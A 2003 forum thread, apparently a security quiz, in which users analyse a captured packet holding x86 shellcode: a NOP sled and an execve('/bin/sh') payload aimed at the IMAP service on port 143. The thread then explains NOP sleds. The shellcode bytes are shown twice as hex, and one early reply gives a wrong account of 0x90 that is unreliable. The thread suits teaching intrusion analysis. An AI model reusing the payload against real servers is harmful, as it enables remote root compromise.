bsdjunkie
March 18th, 2003, 21:14
Ok, yet another easy one.... What can you tell from this capture? Whats the attacker trying to exploit? Whats the significance of the 0x90 in hex?
good luck =P
052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........
schotty
March 19th, 2003, 02:51
Ok, yet another easy one.... What can you tell from this capture? Whats the attacker trying to exploit? Whats the significance of the 0x90 in hex?
good luck =P
052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........
Hmm not sure, but this would make me very suspicious without knowing more info. 0x90 is M^P which when sent to /bin/sh should IIRC do a previous command executed. So unless someone is telnetted in legitimately, there are possible problems ;D
bsdjunkie
March 24th, 2003, 12:39
No one else has any ideas/input on this?
Strog
March 24th, 2003, 22:57
0x90 in hex is NOP codes for Intel-based remote buffer overflow-based attacks.
My guess is a buffer overflow attempt on the imap service at 10:27pm. That's the best I can do at the moment. I really need to educate myself better in this area.
:roll:
schotty
March 24th, 2003, 23:49
I really need to educate myself better in this area.
Dont feel alone ;D As you may have noticed, I am not exactly God in Net Security.
BTW, how the hell close was I ?
bsdjunkie
March 25th, 2003, 12:30
Strog has it right. This was a buffer overflow attempt against port 143 which runs the IMAP daemon. As you can see the attacker is trying to get a root shell. The 0x90 are NOPs and this is commonly referred to as a NOP Sled.
A NOP sled is a series of no-operation instructions in the machine code of the target architecture. This series is often used as part of a buffer overflow technique, where the return address in the call stack is modified to point to exploit code. By using a NOP sled, the precise address of the exploit code need not be known — instead, an address in the middle of the NOPs is chosen, causing execution to slide into the exploit code.